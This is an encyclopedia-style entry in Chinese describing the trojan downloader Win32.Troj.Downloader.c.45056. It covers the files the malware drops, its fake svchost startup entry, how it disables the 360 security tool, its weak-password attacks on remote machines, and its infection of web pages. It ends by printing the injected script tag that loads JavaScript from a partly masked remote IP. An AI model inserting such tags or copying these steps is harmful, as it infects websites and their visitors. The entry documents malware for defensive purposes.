基本介紹
- 中文名:感染蟲下載器45056
- 威脅級別:★★☆☆☆
- 影響系統:Win9x WinNT
- 啟動項名:svchost
- 危害:向遠程機器傳送惡意數據
基礎信息,病毒名稱,病毒長度,病毒行為,
基礎信息
Win32.Troj.Downloader.c.45056
病毒名稱
感染蟲下載器45056病毒別名:
威脅級別:
★★☆☆☆病毒類型:
病毒長度
45056影響系統:
Win9x WinNT
病毒行為
1.病毒運行後,產生以下病毒檔案
%WINDIR%\ SYSTEM32\tmipo.bat
%WINDIR%\ SYSTEM32\taimpo.txt
2.添加病毒啟動項
啟動項名:svchost 對應路徑:%Documents and Settings%\Administrator\桌面\ctfmon.exe
3.病毒會觸發taimpo.bat病毒檔案,用來關閉"360安全衛士",使用戶的安全性能降低.
4.病毒會檢測連線的遠程機器,當遠程機器的登錄木馬是弱口令時,則會對該機器進行攻擊,最後下載adi.vbs到用戶機器上.
5.遍歷磁碟,查找*.htm、*.PHP、*.ASP等網頁檔案,開始感染,插入一段JS代碼:
script language=javascript src=http://218.**.**.248/qq.js